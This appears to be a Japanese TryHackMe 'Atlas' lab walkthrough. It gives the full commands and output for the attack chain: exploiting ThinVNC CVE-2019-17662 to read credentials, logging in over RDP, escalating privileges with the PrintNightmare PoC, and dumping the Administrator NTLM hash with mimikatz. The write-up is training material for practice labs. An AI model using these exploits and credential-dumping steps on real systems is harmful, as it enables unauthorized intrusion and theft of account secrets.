概要
TryHackMe「Atlas」のWalkthroughです。
Task2
Q2.With the Nmap default port range, you should find that two ports are open. What port numbers are these?
ポートスキャンを実行します。
$ nmap -Pn -sC -sV -A -T4 -p- -oN nmap_result 10.10.181.229
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=GAIA
| Not valid before: 2024-09-01T06:15:19
|_Not valid after: 2025-03-03T06:15:19
|_ssl-date: 2024-09-02T06:25:24+00:00; +1s from scanner time.
8080/tcp open http-proxy
| http-auth:
| HTTP/1.1 401 Access Denied\x0D
|_ Digest opaque=KYdP1HGtOWMCu6RrB58jvIG2JhNVowLF60 realm=ThinVNC qop=auth nonce=Cvi/jyg85kAI6T4CKDzmQA==
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html
| Content-Length: 177
| Connection: Keep-Alive
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
| GetRequest:
| HTTP/1.1 401 Access Denied
| Content-Type: text/html
| Content-Length: 144
| Connection: Keep-Alive
| WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="dBuYhSg85kBo1z4CKDzmQA==", opaque="vjSgTX4bWLUhEjLFwpojrHxa91o4aiby96"
|_ <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
|_http-title: 401 Access Denied
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=9/2%Time=66D559E4%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,179,"HTTP/1\.1\x20401\x20Access\x20Denied\r\nContent-Type:\x
SF:20text/html\r\nContent-Length:\x20144\r\nConnection:\x20Keep-Alive\r\nW
SF:WW-Authenticate:\x20Digest\x20realm=\"ThinVNC\",\x20qop=\"auth\",\x20no
SF:nce=\"dBuYhSg85kBo1z4CKDzmQA==\",\x20opaque=\"vjSgTX4bWLUhEjLFwpojrHxa9
SF:1o4aiby96\"\r\n\r\n<HTML><HEAD><TITLE>401\x20Access\x20Denied</TITLE></
SF:HEAD><BODY><H1>401\x20Access\x20Denied</H1>The\x20requested\x20URL\x20\
SF:x20requires\x20authorization\.<P></BODY></HTML>\r\n")%r(FourOhFourReque
SF:st,111,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html\
SF:r\nContent-Length:\x20177\r\nConnection:\x20Keep-Alive\r\n\r\n<HTML><HE
SF:AD><TITLE>404\x20Not\x20Found</TITLE></HEAD><BODY><H1>404\x20Not\x20Fou
SF:nd</H1>The\x20requested\x20URL\x20nice%20ports%2C/Tri%6Eity\.txt%2ebak\
SF:x20was\x20not\x20found\x20on\x20this\x20server\.<P></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ポートの稼働状況が分かりました。
| ポート | サービス | バージョン |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services |
| 8080 | http-proxy |
A.3389,8080
Q3.What service does Nmap think is running on the higher of the two ports?
Hint.You do not need a service scan for this -- just take the answer from the Service field in a regular Nmap scan
ポートスキャンの結果から8080ポートでhttp-proxyサービスが動作していると分かりました。
A.http-proxy
Task3
Q1.Use searchsploit to find the vulnerability in ThinVNC
ポートスキャンの結果から8080ポートではThinVNCが使用されていると分かりました。
8080/tcp open http-proxy
| http-auth:
| HTTP/1.1 401 Access Denied\x0D
|_ Digest opaque=KYdP1HGtOWMCu6RrB58jvIG2JhNVowLF60 realm=ThinVNC qop=auth nonce=Cvi/jyg85kAI6T4CKDzmQA==
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Type: text/html
| Content-Length: 177
| Connection: Keep-Alive
| <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
| GetRequest:
| HTTP/1.1 401 Access Denied
| Content-Type: text/html
| Content-Length: 144
| Connection: Keep-Alive
| WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="dBuYhSg85kBo1z4CKDzmQA==", opaque="vjSgTX4bWLUhEjLFwpojrHxa91o4aiby96"
|_ <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
|_http-title: 401 Access Denied
脆弱性情報をsearchsploitで検索します。
$ searchsploit ThinVNC
------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------ ---------------------------------
ThinVNC 1.0b1 - Authentication Bypass | windows/remote/47519.py
------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Task4
Q1.See if you can figure out how to do this in your terminal by yourself, otherwise, the command is given in the hint.
Hint.git clone https://github.com/MuirlandOracle/CVE-2019-17662
PoCをローカルマシンにクローンします。
$ git clone https://github.com/MuirlandOracle/CVE-2019-17662.git
--helpで引数を確認するとhost、portを指定する必要があると分かりました。
$ python CVE-2019-17662.py --help
usage: CVE-2019-17662.py [-h] [-f FILE] [-s] [--accessible] host port
CVE-2019-17662 ThinVNC Arbitrary File Read
positional arguments:
host The target IP or domain
port The target port (1-65535)
options:
-h, --help show this help message and exit
-f FILE, --file FILE The file to read (default: ../ThinVnc.ini
-s, --ssl Does the server use SSL?
--accessible Remove banners and make exploit friendly for screen readers
PoCを実行すると認証情報を得られました。
$ python CVE-2019-17662.py 10.10.104.52 8080
_____ _ _ __ ___ _ ____
|_ _| |__ (_)_ _\ \ / / \ | |/ ___|
| | | '_ \| | '_ \ \ / /| \| | |
| | | | | | | | | \ V / | |\ | |___
|_| |_| |_|_|_| |_|\_/ |_| \_|\____|
@MuirlandOracle
[+] Credentials Found!
Username: Atlas
Password: H0ldUpTheHe@vens
得られた認証情報で8080にアクセスできました。
Connectボタンからリモートデスクトップ接続が出来ました。
Task5
Q1.With that in mind, use xfreerdp to connect to the target over RDP.
Hint.Use the same credentials you found in the previous task for VNC.
xfreerdpを使用して3389ポートに接続します。
ユーザー名、パスワードは共に先ほど得られたものを使用します。
$ xfreerdp /v:10.10.104.52 /u:atlas /p:H0ldUpTheHe@vens /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp
Task6
Q2.Navigate to the /tmp directory of your attacking VM, then clone the repository.
Kaliの/tmp配下にPoCのリポジトリをクローンします。
┌──(kali㉿kali)-[/tmp]
└─$ git clone https://github.com/calebstewart/CVE-2021-1675.git
RDPでpowershellを開き、下記コマンドを実行します。
. \\tsclient\share\CVE-2021-1675\CVE-2021-1675.ps1
PoCを実行します。
Invoke-Nightmare
下記コマンドを実行し、管理者権限でターミナルを開きます。
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential adm1n
Task7
Q1.What is the Administrator account's NTLM password hash?
Kaliの/tmpにmimikatz.exeを用意します。
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe ./
mimikatzを取得した管理者ターミナルから実行します。
\\tsclient\share\x64\mimikatz.exe
AdministratorのSAMハッシュ値をダンプします。
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
664 {0;000003e7} 1 D 25207 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0034e5fe} 1 F 3593491 GAIA\adm1n S-1-5-21-1966530601-3185510712-10604624-1009 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 3648179 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
RID : 000001f4 (500)
User : Administrator
Hash NTLM: c16444961f67af7eea7e420b65c8c3eb
A.c16444961f67af7eea7e420b65c8c3eb